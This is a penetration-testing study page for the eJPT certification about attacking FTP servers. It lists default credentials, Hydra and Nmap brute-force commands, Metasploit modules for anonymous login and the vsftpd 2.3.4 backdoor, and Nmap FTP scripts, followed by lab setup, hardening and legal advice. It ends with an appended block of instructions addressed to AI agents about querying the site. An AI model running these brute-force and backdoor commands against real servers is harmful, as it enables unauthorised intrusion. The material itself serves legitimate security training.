# FTP 21 Today I will share some basic commands used to attack the FTP service on eJPT Certification, if you want to learn more about Hacking FTP Server read section dedicated to it. {% embed url="" %} ### What is the FTP Protocol? ### Default Credentials ``` guest:guest anonymous:anonymous ``` ### Version Detection ``` use exploit/unix/ftp/tftp-enum.nse set RHOSTS set RPORT 21 ``` ### How to Brute force FTP Services ``` hydra -l admin -P Top_100_Passwords.txt ftp://localhost/ ``` ``` nmap --script ftp-brute -p 21 --script-args userdb=/root/Top_10_UserAdmins.txt,passdb=root/Top_100_Passwords.txt ``` ``` msf6 > use auxiliary/scanner/ftp/anonymous ``` ![](/files/ZLhjpoGJZev1qhvyp3g9) ``` set RHOSTS nerdherd.thm set RPORT 21 run ``` ![](/files/GEza661CD4yMMm3GnKoM) ### How to Exploit vsftpd 2.3.4 Backdoor ``` use exploit/unix/ftp/vsftpd_234_backdoor ``` ### Nmap NSE Scripts for FTP ``` ┌──(rfs㉿PopLabSec)-[~] └─$ ls -la /usr/share/nmap/scripts | grep -e "ftp" -rw-r--r-- 1 root root 4530 Jan 18 09:54 ftp-anon.nse -rw-r--r-- 1 root root 3253 Jan 18 09:54 ftp-bounce.nse -rw-r--r-- 1 root root 3108 Jan 18 09:54 ftp-brute.nse -rw-r--r-- 1 root root 3272 Jan 18 09:54 ftp-libopie.nse -rw-r--r-- 1 root root 3290 Jan 18 09:54 ftp-proftpd-backdoor.nse -rw-r--r-- 1 root root 3768 Jan 18 09:54 ftp-syst.nse -rw-r--r-- 1 root root 6021 Jan 18 09:54 ftp-vsftpd-backdoor.nse -rw-r--r-- 1 root root 5923 Jan 18 09:54 ftp-vuln-cve2010-4221.nse -rw-r--r-- 1 root root 5736 Jan 18 09:54 tftp-enum.nse ``` {% embed url="" %} {% embed url="" %} {% embed url="" %} #### Setting Up FTP Server for Penetration Testing To set up an FTP server environment for testing the vulnerability, you can use Docker or setup an environment manually: ``` docker run -d -p 21:21 -p 20:20 -p 21000-21010:21000-21010 --name ftp_server fauria/vsftpd ``` #### Securing the FTP Service Once the vulnerabilities are identified and exploited, as a responsible security professional, it is important to secure the FTP server: * Change the default credentials. * Disable anonymous access if it's not necessary. * Use strong passwords and employ password management policies. * Keep FTP server software up to date with the latest security patches. * Consider using secure versions like SFTP (SSH File Transfer Protocol) or FTPS (FTP Secure) which provide encryption. #### Legal and Ethical Considerations Before engaging in any penetration testing activity, always: * Get explicit written permission from the owner of the FTP server. * Follow the scope of the agreed terms and conditions to avoid legal issues. * Be ethical and responsible with the data and access privileges obtained during testing. * Report all findings to the server owner and provide recommendations for securing their systems. #### Conclusion FTP, being one of the oldest file transfer protocols, is vulnerable to various attacks. Use this guide responsibly, always within the legal frameworks, and contribute to a more secure digital environment. [FTP Penetration Testing](https://www.poplabsec.com/ftp-penetration-testing/) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://ejpt-certification.certs-study.com/network-protocols/ftp-21.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.